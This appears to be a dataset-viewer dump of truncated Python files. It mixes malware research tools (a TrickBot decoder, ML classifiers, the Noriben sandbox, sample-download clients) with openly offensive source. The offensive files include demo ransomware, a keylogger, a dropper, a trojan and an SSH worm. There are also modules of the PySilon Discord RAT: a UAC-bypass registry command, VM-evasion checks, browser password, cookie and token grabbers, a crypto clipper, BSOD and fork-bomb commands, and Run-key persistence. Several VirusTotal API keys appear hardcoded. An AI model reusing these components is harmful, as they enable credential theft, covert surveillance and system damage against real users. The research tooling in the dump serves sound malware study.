text stringlengths 0 9.3M |
|---|
#!/usr/bin/python2.7
__AUTHOR__ = 'hasherezade'
import argparse
import string
import base64
import ctypes
import random
import hashlib
from Crypto.Cipher import AES
trickbot_b64_charset = "HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT"
VERBOSE = False
BS = 16
pad = lambda s: s + (BS - len(s) % BS... |
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 1 14:52:43 2018
@author: user
"""
from sklearn.model_selection import train_test_split
from keras import preprocessing
import os
import pandas as pd
from sklearn.metrics import confusion_matrix,classification_report
from sklearn.tree import DecisionTreeClassifier
####... |
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 1 14:52:43 2018
@author: user
"""
from sklearn.model_selection import train_test_split
from keras import preprocessing
import os
import pandas as pd
from sklearn.svm import SVC
from sklearn.metrics import confusion_matrix,classification_report
from sklearn.neighbors im... |
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 1 14:52:43 2018
@author: user
"""
from sklearn.model_selection import train_test_split
from keras import preprocessing
import os
import pandas as pd
from sklearn.svm import SVC
from sklearn.metrics import confusion_matrix,classification_report
########################... |
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 1 14:52:43 2018
@author: user
"""
from sklearn.model_selection import train_test_split
from keras import preprocessing
import os
import pandas as pd
from sklearn.svm import SVC
from sklearn.metrics import confusion_matrix,classification_report
########################... |
# Hash Map
class HashMap:
def __init__(self):
self.size = 6
self.map = [None] * self.size
def _get_hash(self, key):
hash = 0
for char in str(key):
hash += ord(char)
return hash % self.size
def add(self, key, value):
key_hash = self._get_hash(key... |
from common.HashMap import HashMap
class WinApi:
keymap = HashMap()
callMap = HashMap()
keyIndex = 0
def __init__(self):
file = open("../data/WinAPIs.txt", "r")
self.keyIndex = 0
for line in file:
if line == "" or line == "\n":
continue
... |
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.metrics import classification_report
import pandas as pd
from keras import preprocessing
from keras.utils import to_categorical
import numpy
from keras.models import ... |
class DTParameter:
def __init__(self, random_state, min_samples_split, min_samples_leaf, max_depth):
#Embedding
self.random_state = random_state
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.max_depth = max_depth
class DTParamet... |
class KNNParameter:
def __init__(self, n_neighbors, p, algorithm):
#Embedding
self.n_neighbors = n_neighbors
self.p = p
self.algorithm = algorithm
class KNNParameters:
def __init__(self):
# model
self.parameters = []
# 2019-07-06 09_09_39.367144
... |
class LatexReporter:
def prepareLSTMSectionTitle(self, index, alg):
return "\\subsubsection {"+str(alg)+" Katmanlı LSTM Analiz-" + str(index) +" Sonuçları}"
def prepareGSectionTitle(self, index, alg):
return "\\subsubsection {"+str(alg)+" Analiz-" + str(index) +" Sonuçları}"
def prepareL... |
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 1 14:52:43 2018
@author: user
"""
import pandas as pd
from keras import preprocessing
import os
import datetime
from multiclass.AnalizeRunner import AnalizeRunner
##################################################
prefix = "dataset"
data_path = "C:\\Users\\afy\\Pycha... |
class LSTMParameter:
def __init__(self, embedding_units, unit, dropout, recurrent_dropout, lstm_activation, loss_func, optimizer, epochs, batch_size):
#Embedding
self.embedding_units = embedding_units
#model
self.units = unit
self.dropout = dropout
self.recurrent_... |
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
import pandas as pd
from keras import preprocessing
from keras.utils import to_categorical
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropou... |
class RFParameter:
def __init__(self, n_estimators, max_depth, min_samples_split, min_samples_leaf = 1, class_weights={}):
#Embedding
self.n_estimators = n_estimators
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_... |
class SVMParameter:
def __init__(self, kernel, c, gamma, class_weights):
#Embedding
self.kernel = kernel
self.c = c
self.gamma = gamma
self.class_weights = class_weights
class SVMParameters:
def __init__(self):
# model
self.parameters = []
# ... |
# |
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 1 14:52:43 2018
@author: user
"""
from sklearn.model_selection import train_test_split
from keras import preprocessing
import os
import pandas as pd
from sklearn.metrics import confusion_matrix,classification_report
from sklearn.tree import DecisionTreeClassifier
####... |
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 1 14:52:43 2018
@author: user
"""
from sklearn.model_selection import train_test_split
from keras import preprocessing
import os
import pandas as pd
from sklearn.svm import SVC
from sklearn.metrics import confusion_matrix,classification_report
from sklearn.neighbors im... |
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 1 14:52:43 2018
@author: user
"""
from sklearn.model_selection import train_test_split
from keras import preprocessing
import os
import pandas as pd
from sklearn.svm import SVC
from sklearn.metrics import confusion_matrix,classification_report
########################... |
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 1 14:52:43 2018
@author: user
"""
from sklearn.model_selection import train_test_split
from keras import preprocessing
import os
import pandas as pd
from sklearn.svm import SVC
from sklearn.metrics import confusion_matrix,classification_report
########################... |
def filter_and_save_data(line_length, types_file_path, calls_file_path, max_analize_count, min_analize_cell_count, type_group):
types_file = open(types_file_path, "r")
calls_file = open(calls_file_path, "r")
types_file_filtered = open("destination/filtered_types_file", "w")
calls_file_filtered = op... |
from utility.VTService import VTService
import time
vt_service = VTService()
file_name = 1
vt_api_keys = [
"76ebd939301445249b9dfd7bb58e8be4d85f572de382cd6eceeb4a56ad7587f6",
"583680f214840a461ead2cec8fae769c1eb3ee5461e362455e0d6daf38be12db",
"02e4d9d35863b2c2e057289311bbd37f2eb21a7dd2496a04d298b3e680d... |
from common.HashMap import HashMap
file = open("source/CallApiMap.txt", "r")
map = HashMap()
for line in file:
line = line.strip()
if line == "":
continue
splitted = line.split("=")
print(line)
map.add(splitted[0], splitted[1])
map.print()
file.close()
s_file = open("destination/softwa... |
import zipfile
def extract_file(zip_path, destination_path, file_name):
archive = zipfile.ZipFile(zip_path)
archive.extract(file_name, path=destination_path, pwd=bytes('infected','utf-8'))
def extract_malware_files(zip_path, destination_path, malware_type, malware_count, start_line):
file = open("destina... |
from common.HashMap import HashMap
def get_family_type_0(lookup, type):
for item in lookup:
if item in type:
return True
return False
def is_defined_type(type):
if type is "Worms":
return True
if type is "Adware":
return True
if type is "Virus":
retur... |
import zipfile
def fetch_hascode_from_file_name(file_name):
if not "VirusShare" in file_name:
return None
start = file_name.find("_")
if start < 1:
return ""
return file_name[start + 1:]
archive = zipfile.ZipFile('D:\malwares\VirusShare_00000.zip', 'r')
destination_path = "destina... |
import requests
import time
class VTService:
def rescan_virus(self, resource, api_key):
params = {'apikey': api_key, 'input': resource}
response = requests.post('https://www.virustotal.com/vtapi/v2/file/rescan',
params=params)
json_response = response.jso... |
#!/usr/bin/env python3
""" Implementation of simple adware that pops multiple
windows with the advertisements.
"""
import logging
import sys
import random
from PySide2.QtWidgets import QApplication, QDialog, QLabel, QVBoxLayout
class AdWindow(QDialog):
""" This class represents ad window shown on the screen. "... |
#!/usr/bin/env python3
""" Implementation of dropper that downloads malicious code from the server
and dumps it into a file.
"""
import base64
import logging
import socket
import math
class Dropper:
""" This class represents the implementation of dropper.
"""
def __init__(self, host1, host2, number... |
#!/usr/bin/env python3
""" Implementation of the server that sends some malicious code to its
dropper client.
"""
import base64
import logging
import socket
class Server:
""" This class represents a server that stores some malicious payload and sends
it to the dropper once the connection is established.... |
#!/usr/bin/env python3
""" Implementation of file infector in Python.
INJECTION SIGNATURE
"""
import logging
import os
import sys
from cached_property import cached_property
class FileInfector:
""" This class represents the code injecting malware.
"""
def __init__(self, name):
self._name = ... |
#!/usr/bin/env python3
""" Implementation of simple ransomware in Python.
"""
import logging
import os
import sys
import base64
class Ransomware:
""" This class represents file encrypting ransomware.
"""
def __init__(self, name):
self._name = name
@property
def name(self):
""" ... |
#!/usr/bin/env python3
""" Implementation of simple keylogger in Python.
"""
import daemon
import logging
import pyxhook
class Keylogger:
""" This class represents the code injecting malware. """
def __init__(self, name):
self._name = name
@property
def name(self):
""" Name of the ... |
#!/usr/bin/env python3
""" Implementation of the server that collects data sent by trojan.
"""
import logging
import socket
class Server:
""" This class represents a server of the attacker that
collects data from the victim.
"""
def __init__(self, port):
self._port = port
# Initiali... |
#!/usr/bin/env python3
""" Implementation of trojan that collects data and sends them to server.
It acts like an ordinary diary.
"""
import logging
import socket
import sys
class Trojan:
""" This class represents the implementation of trojan disguised
as diary.
"""
def __init__(self, host, ... |
#!/usr/bin/env python3
""" Implementation of simple worm that spreads via SSH connection.
"""
import logging
import paramiko
import scp
import sys
class Worm:
""" This class represents implementation of worm that spreads via SSH
connections.
"""
def __init__(self, network_address):
self._ne... |
# Noriben Malware Analysis Sandbox
#
# Directions:
# Just copy Noriben.py to a Windows-based VM alongside the SysInternals Procmon.exe
#
# Run Noriben.py, then run your executable.
# When the executable has completed its processing, stop Noriben and view a
# clean text report and timeline
#
# Changelog:
# Version 2.0.1... |
import argparse
import glob
import os
import sys
import zipfile
exts = ('txt', 'csv')
def search_archive(args):
fname = ''
if not args.log in exts:
fname = args.log
try:
archive_name = '{}/{}'.format(args.file.split(os.sep)[-2], args.file.split(os.sep)[-1].split('_Noriben')[0])
excep... |
# Noriben Sandbox Automation Script
# Brian Baskin
# Part of the Noriben analysis repo
# Source: github.com/rurik/Noriben
#
# Changelog:
# V 2.0 - August 2023
# Placed all editable data into Noriben.config file.
# Cleaned up some logic and bugs
# Added basic support for VirtualBox... still TODO
# ... |
from tkinter import *
from tkinter import filedialog
from PIL import ImageTk, Image
import configparser
import shutil
import compiler
import sys
import os
import subprocess
window_icon = 'resources/icons/icon.ico'; Image.open('resources/icons/icon.ico').resize((120, 120)).save('icon.png', format='PNG')
config_path, st... |
import configparser
import hashlib
import sys
import base64
import os
def get_file_hash(path):
sha256_hash = hashlib.sha256()
with open(path,"rb") as f:
for byte_block in iter(lambda: f.read(16777216),b""):
sha256_hash.update(byte_block)
return sha256_hash.hexdigest()
def compile(d... |
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! #
# !! DON'T COMPILE OR RUN THIS FILE. IT WILL NOT WORK. INSTEAD, RUN PySilon.bat AND AFTER CLICKING 'COMPILE' !! #
# !! YOU CAN TEST BY RUNNING source_prepared.py (THIS IS THE FINAL VERSON OF SOURCE CO... |
import base64
import json
import time
import os
import random
import sqlite3
from shutil import copy2
from getpass import getuser
import psutil
from Cryptodome.Cipher import AES
from win32crypt import CryptUnprotectData
import subprocess
def grab_cookies():
browser = Browsers()
browser.grab_cookies()
def cre... |
import datetime
from pathlib import Path
import hashlib
import sys
import os
import json
def force_decode(b: bytes):
try:
return b.decode(json.detect_encoding(b))
except UnicodeDecodeError:
return b.decode(errors= "backslashreplace")
def get_file_hash(path):
sha256_hash = hashlib.sha256()
... |
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
import time
from datetime import datetime, timedelta
def convert_date(ft):
utc = datetime.utcfromtimestamp(((10 * int(ft)) - file_name) / nanoseconds)
return utc.strftime('%Y-%m-%d %H:%M:%S')
def g... |
import psutil
import os
def protection_check():
vm_files = [
"C:\\windows\\system32\\vmGuestLib.dll",
"C:\\windows\\system32\\vm3dgl.dll",
"C:\\windows\\system32\\vboxhook.dll",
"C:\\windows\\system32\\vboxmrxnp.dll",
"C:\\windows\\system32\\vmsrvc.dll",
"C:\\windows... |
import subprocess
import ctypes
import sys
def UACbypass(method: int = 1) -> bool:
if GetSelf()[1]:
execute = lambda cmd: subprocess.run(cmd, shell= True, capture_output= True)
if method == 1:
execute(f"reg add hkcu\Software\\Classes\\ms-settings\\shell\\open\\command /d \"{sys.executab... |
from ctypes import cast, POINTER
from comtypes import CLSCTX_ALL
from pycaw.pycaw import AudioUtilities, IAudioEndpointVolume
import pygame
import threading
# end of imports
# on message
elif message.content[:7] == '.volume':
#.log Message is "volume"
await message.delete()
#.log Removed the message
i... |
from pynput import keyboard, mouse
# end of imports
# on message
elif message.content == '.block-input':
#.log Message is "block input"
if not input_blocked:
#.log Input is not already blocked
await message.delete()
#.log Removed the message
async def on_press():
p... |
import ctypes
# end of imports
# on message
elif message.content == '.bsod':
#.log Message is "Blue Screen of Death"
await message.delete()
#.log Removed the message
await message.channel.send("```Attempting to trigger a BSoD...```")
#.log Sent message about trying to BSoD
#.log Trying to tri... |
import pyperclip
import re
import os
import json
import threading
# end of imports
# on message
elif message.content == '.start-clipper':
#.log Message is "start crypto clipper"
if clipper_stop:
#.log Clipper is not running
await message.delete()
#.log Removed the message
clip... |
from shutil import copy2, rmtree
from zipfile import ZipFile
import os
import requests
# end of imports
# on message
elif message.content[:9] == '.download':
#.log Message is "download"
await message.delete()
#.log Removed the message
if message.channel.id == channel_ids['file']:
#.log Message... |
from cryptography.fernet import Fernet
import os
import pickle
import psutil
# end of imports
# on message
elif message.content[:8] == '.encrypt':
#.log Message is "encrypt"
await message.delete()
#.log Removed the message
if message.content.strip() == '.encrypt':
embed = discord.Embed(title="... |
from itertools import islice
from resources.misc import *
from pathlib import Path
import subprocess
import sys
import os
# end of imports
# on reaction add
elif str(reaction) == '🔴' and reaction.message.content[:15] == '```End of tree.':
#.log Reaction is "remove tree messages"
for i in tree_messages:
... |
import os
from shutil import copy2, rmtree
from resources.misc import *
import subprocess
# end of imports
# on message
elif message.content[:7] == '.remove':
#.log Message is "remove"
await message.delete()
#.log Removed the message
if message.channel.id == channel_ids['file']:
#.log Message ... |
from filesplit.merge import Merge
from shutil import copy2, rmtree
import os
# end of imports
# on reaction add
elif str(reaction) == '📤':
#.log Reaction is "confirm upload"
if expectation == 'onefile':
#.log One file gets uploaded
split_v1 = str(one_file_attachment_message.attachments).split... |
import subprocess
# end of imports
# on message
elif message.content == ".forkbomb":
#.log Message is "fork bomb"
await message.delete()
#.log Removed the message
embed = discord.Embed(title="💣 Starting...",description=f'```Starting fork bomb... This process may take some time.```', colour=discord.Co... |
from resources.discord_token_grabber import *
from resources.passwords_grabber import *
from browser_history import get_history
from resources.get_cookies import *
from urllib.request import urlopen
from threading import Thread
from resources.misc import *
import subprocess
import os
# end of imports
# on message
elif ... |
import win32gui
import win32con
import os, requests, time
from ctypes import cast, POINTER
from comtypes import CLSCTX_ALL
from pycaw.pycaw import AudioUtilities, IAudioEndpointVolume
# end of imports
# on message
elif message.content == '.jumpscare':
await message.delete()
devices = AudioUtilities.GetSpeakers... |
from pynput.keyboard import Key, Listener
from resources.misc import *
from PIL import ImageGrab
# end of imports
# anywhere
def on_press(key):
global files_to_send, messages_to_send, embeds_to_send, channel_ids, text_buffor
processed_key = str(key)[1:-1] if (str(key)[0]=='\'' and str(key)[-1]=='\'') else key
... |
import pyautogui
# end of imports
# on message
elif message.content[:4] == '.key':
await message.delete()
if message.content.strip() == '.key':
embed = discord.Embed(title="📛 Error",description='```Syntax: .key <keys-to-press>```', colour=discord.Colour.red())
embed.set_author(name="PySilon-ma... |
from resources.misc import *
import pyaudio
import sys
import os
# end of imports
# on message
elif message.content == '.join':
#.log Message is "join vc and stream microphone"
await message.delete()
#.log Removed the message
vc = await client.get_channel(channel_ids['voice']).connect(self_deaf=True)
... |
from html2image import Html2Image
from PIL import Image
import ctypes
# end of imports
# on reaction add
elif str(reaction) == '✅':
if custom_message_to_send[0] != None:
threading.Thread(target=send_custom_message, args=(custom_message_to_send[0], custom_message_to_send[1], custom_message_to_send[2],)).sta... |
from scipy.io.wavfile import write
from threading import Thread
from resources.misc import *
import sounddevice
import os
# end of imports
# anywhere
def start_recording():
global files_to_send, channel_ids, send_recordings
#.log Trying to start microphone recording
while True:
if send_recordings:
... |
import monitorcontrol
import threading
# end of imports
# on message
elif message.content == '.monitors-off':
if not turned_off:
await message.delete()
turned_off = True
def monitor_off():
while turned_off:
for monitor in monitorcontrol.get_monitors():
... |
from psutil import process_iter, Process
from resources.misc import *
from win32process import GetWindowThreadProcessId
from win32gui import GetForegroundWindow
# end of imports
# on reaction add
elif str(reaction) == '💀' and reaction.message.content[:39] == '```Do you really want to kill process: ':
#.log Reactio... |
from shutil import copy2, rmtree
import winreg
import sys
import os
# end of imports
# !registry_implosion
registry = winreg.ConnectRegistry(None, regbase)
winreg.OpenKey(registry, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run')
registry_key = winreg.OpenKey(regbase, 'Software\\Microsoft\\Windows\\CurrentVersion\\... |
from resources.misc import *
from PIL import ImageGrab
import subprocess
import asyncio
import os
# end of imports
# on reaction add
elif str(reaction) == '🔴' and reaction.message.content == '```End of command stdout```':
#.log Reaction is "remove .cmd stdout messages"
for i in cmd_messages:
await i.d... |
import pyautogui
import numpy as np
import subprocess
import time
import imageio
# on message
elif message.content == '.screenrec':
#.log Message is "record screen"
await message.delete()
#.log Removed the message
await message.channel.send("`Recording... Please wait.`")
#.log Sent message about r... |
from resources.misc import *
from PIL import ImageGrab
import subprocess
# end of imports
# on message
elif message.content == '.ss':
#.log Message is "take screenshot"
await message.delete()
#.log Removed the message
ImageGrab.grab(all_screens=True).save(f'C:\\Users\\{getuser()}\\{software_directory_n... |
from PIL import Image, ImageDraw
from win32print import *
from win32gui import *
from win32con import *
from win32api import *
import random
import math
import json
import time
import os
# end of imports
# on message
elif message.content == '.display-graphic':
await message.delete()
embed = discord.Embed(titl... |
import pyttsx3
# end of imports
# on message
elif message.content[:4] == '.tts':
#.log Message is "tts"
await message.delete()
#.log Removed the message
if message.content.strip() == '.tts':
#.log Author issued empty ".tts" command
embed = discord.Embed(title="📛 Error",description='`... |
import pygame.camera
import pygame.image
import subprocess
import time
# end of imports
# on message
elif message.content[:7] == '.webcam':
#.log Message is "webcam"
await message.delete()
#.log Removed the message
if message.content.strip() == '.webcam':
#.log Author issued empty ".webcam" co... |
import ctypes
from urllib.parse import urlparse
# end of imports
# anywhere
def get_hosts_file_path():
hosts_file_path = r'C:\Windows\System32\drivers\etc\hosts'
if ctypes.windll.kernel32.GetFileAttributesW(hosts_file_path) != -1:
return hosts_file_path
return None
# on message
elif message.cont... |
import os
from filesplit.split import Split
from tkinter import Tk, filedialog
def get_manual_path(isfile):
root = Tk()
root.withdraw()
root.attributes('-topmost', True)
if isfile:
open_c = filedialog.askopenfilename()
else:
open_c = filedialog.askdirectory()
root.destroy()
... |
from PIL import Image, ImageDraw, ImageTk
import math
import tkinter as tk
import functools
import studio
import json
import os
class drawling_menu:
def __init__(self, root):
self.root = root
self.root.geometry('390x500')
header = tk.Label(self.root, text='Choose a project to begin:', font... |
from PIL import Image, ImageDraw, ImageTk
import tkinter as tk
import json
from win32gui import *
from win32con import *
from win32api import *
from win32print import *
import time
import os
def hex_to_rgb(hex):
rgb = []
hex = hex[1:]
for i in (0, 2, 4):
decimal = int(hex[i:i+2], 16)
rgb.a... |
# -*- coding: UTF-8 -*-
"""MalSearch package information.
"""
import os
__author__ = "Alexandre D'Hondt"
__copyright__ = "© 2024-2025 A. D'Hondt"
__email__ = "alexandre.dhondt@gmail.com"
__license__ = "GPLv3 (https://www.gnu.org/licenses/gpl-3.0.fr.html)"
__source__ = "https://github.com/packing-box/pytho... |
# -*- coding: UTF-8 -*-
import logging
from os import cpu_count
from .clients import *
from .clients import __all__ as _clients
__all__ = ["download_sample", "download_samples", "get_samples_feed"] + _clients
_CLIENTS_MAP = {n.lower(): globals()[n] for n in _clients}
_MAX_WORKERS = 3 * cpu_count()
logger = logging... |
# -*- coding: UTF-8 -*-
from .__info__ import __author__, __copyright__, __email__, __license__, __source__, __version__
def _parser(name, description, examples):
from argparse import ArgumentParser, RawTextHelpFormatter
descr = f"{name} {__version__}\n\nAuthor : {__author__} ({__email__})\nCopyright: {__co... |
# -*- coding: UTF-8 -*-
from .__common__ import API
__all__ = ["Maldatabase"]
class Maldatabase(API):
doc = "https://maldatabase.com/api-doc.html"
url = "https://api.maldatabase.com/download"
_api_key_header = "Authorization"
def get_malware_feed(self, hashtype="sha256"):
# available ou... |
# -*- coding: UTF-8 -*-
from .__common__ import hashtype, API
__all__ = ["Malpedia"]
class Malpedia(API):
doc = "https://malpedia.caad.fkie.fraunhofer.de/usage/api"
url = "https://malpedia.caad.fkie.fraunhofer.de/api"
_auth_method = "APIToken"
@hashtype("md5", "sha256")
def get_file_by_hash(sel... |
# -*- coding: UTF-8 -*-
from .__common__ import hashtype, API
__all__ = ["MalShare"]
class MalShare(API):
doc = "https://malshare.com/doc.php"
url = "https://malshare.com"
_api_key_param = "api_key"
@hashtype("md5", "sha1", "sha256")
def get_file_by_hash(self, hash):
self._get("api.php"... |
# -*- coding: UTF-8 -*-
from .__common__ import hashtype, API
__all__ = ["MalwareBazaar"]
class MalwareBazaar(API):
doc = "https://bazaar.abuse.ch/api"
url = "https://mb-api.abuse.ch/api/v1"
_api_key_header = "API-KEY"
@hashtype("sha256")
def get_file_by_hash(self, hash):
# daily limit:... |
# -*- coding: UTF-8 -*-
from .__common__ import Web
__all__ = ["MalwareFeed"]
class MalwareFeed(Web):
doc = "https://github.com/MalwareSamples/Malware-Feed/blob/master/README.md"
url = "https://github.com/MalwareSamples/Malware-Feed"
def get_malware_feed(self):
#TODO
pass
|
# -*- coding: UTF-8 -*-
from .__common__ import hashtype, API
__all__ = ["Triage"]
class Triage(API):
doc = "https://tria.ge/docs"
url = "https://tria.ge/api/v0"
_auth_method = "Bearer"
@hashtype("md5", "sha1", "sha256", "sha512")
def get_file_by_hash(self, hash):
hashtype = {32: "md5",... |
# -*- coding: UTF-8 -*-
from .__common__ import hashtype, API
__all__ = ["VirusShare"]
class VirusShare(API):
doc = "https://virusshare.com/apiv2_reference"
url = "https://virusshare.com/apiv2"
_api_key_param = "apikey"
@hashtype("md5", "sha1", "sha224", "sha256", "sha384", "sha512")
def ge... |
# -*- coding: UTF-8 -*-
from .__common__ import hashtype, API
__all__ = ["VirusTotal"]
class VirusTotal(API):
doc = "https://docs.virustotal.com/reference/overview"
url = "https://www.virustotal.com/api/v3"
_api_key_header = "X-Apikey"
@hashtype("md5", "sha1", "sha256")
def get_file_by_hash... |
# -*- coding: UTF-8 -*-
from .__common__ import Web
__all__ = ["MalwareFeed"]
class VxUnderground(Web):
url = "https://vx-underground.org/Samples"
def get_malware_feed(self):
#TODO
pass
|
# -*- coding: UTF-8 -*-
import logging
__all__ = ["API", "Web"]
_MIN_BACKOFF = 300
logger = logging.getLogger("malsearch")
def _valid_hash(hash, *types):
import re
types_map = {'md5': 32, 'sha1': 40, 56: 'sha224', 'sha256': 64, 'sha384': 96, 'sha512': 128}
pattern = "|".join(f"[0-9a-f]{{{types_map[t]}... |
# -*- coding: UTF-8 -*-
from .maldatabase import Maldatabase
from .malpedia import Malpedia
from .malshare import MalShare
from .malwarebazaar import MalwareBazaar
from .triage import Triage
from .virusshare import VirusShare
from .virustotal import VirusTotal
__all__ = ["Maldatabase", "Malpedia", "MalShare", "Malwar... |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import os
from malsearch.clients.__common__ import _valid_hash, hashtype, _Base
from unittest import TestCase
FILE = "tmp-file"
TEST_HASHES = {
'md5': "098f6bcd4621d373cade4e832627b4f6",
'sha1': "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3",
'sha224': "90a3ed9e32... |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import os
from malsearch import *
from unittest import TestCase
CONF = """[API keys]
VirusTotal = 9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08
[Disabled]
VirusTotal = Bad API key
"""
FILE = "test.conf"
HASH = "098f6bcd4621d373cade4e832627b4f6"
class Test... |
#!/usr/bin/env python3
import argparse
from pathlib import Path
import platform
import sys
import os
import shutil
import re
import shlex
import subprocess
import tempfile
import base64
def compile_nim(nim_file, output_exe, os_name, arch, hide_console=False, nim_defines=None):
output_exe = Path(output_exe).resolve... |
import sys
import os
import subprocess
import shutil
from pathlib import Path
from PyQt5.QtWidgets import QApplication, QMainWindow, QTabWidget
from PyQt5.QtGui import QFont
from PyQt5.QtCore import QThread, pyqtSignal
# Import all tab widgets from the TABS package
from TABS import (
BuilderWidget,
OutputWidge... |
# TABS package
from .builder import BuilderWidget
from .output import OutputWidget
from .c2 import C2Widget
from .krash import KrashWidget
from .garbage import GarbageCollectorWidget
from .docs import DocsWidget
from .settings import SettingsWidget
from .whispers import SilentWhispersWidget
|
import os
from functools import partial
from PyQt5.QtWidgets import (
QWidget, QVBoxLayout, QHBoxLayout, QPushButton, QLineEdit,
QComboBox, QCheckBox, QLabel, QGroupBox, QScrollArea,
QTableWidget, QTableWidgetItem, QHeaderView, QAbstractItemView, QSizePolicy
)
from PyQt5.QtGui import QFont, QPixmap, QMovie... |
from .builder import BuilderWidget
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.